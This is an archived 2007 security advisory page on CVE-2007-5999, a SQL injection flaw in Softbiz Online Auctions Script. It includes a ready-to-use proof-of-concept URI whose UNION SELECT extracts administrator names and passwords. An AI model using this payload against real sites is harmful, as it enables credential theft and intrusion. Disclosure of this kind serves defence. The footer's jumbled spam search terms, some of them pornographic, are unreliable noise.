about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Softbiz Online Auctions Script PRODUCT_DESC.PHP SQL Injection Vulnerability


Title Softbiz Online Auctions Script PRODUCT_DESC.PHP SQL Injection Vulnerability
Published 2007-11-11-12:00AM
Updated 2007-11-23-08:34PM
Class Input Validation Error
CVE   CVE-2007-5999
Remote  Yes
Local  No
Credit  IRCRASH discovered this vulnerability.
Vulnerable  SoftBiz Online Auctions Script 0
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URI is available:http://www.example.com/product_desc.php?id=999999%20union/**/select/**/0,1,admin_name,3,4,5,6,7,8,9,10,pwd,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/sbauctions_admin/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 10:11:18 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
vidos feer wep-faq HTTP RPC E kernel 2.4 www.free s fuckingpor Sex flim guest book Thuluvatho Vidio ayu Powered+by www.wrld s WWW.GOETV invision p girlssex 200 /compo www.xdieos news for c Sex+sex+se 200 /compo sr. clerk Sextube.co t435t www.wrld s www.xdieos Loo3 Download K www.freeho /administr t396t mambo Remo Www.xnxx.c t473t arab youpo WWW.GOETV news for c CMS is Fre xoopsgalle wolrdsex isc bind Milkmans s phimsex.co Easy Bann apache 2. trisha.sex cross-site www.waptri robots.txt youporn hentai nar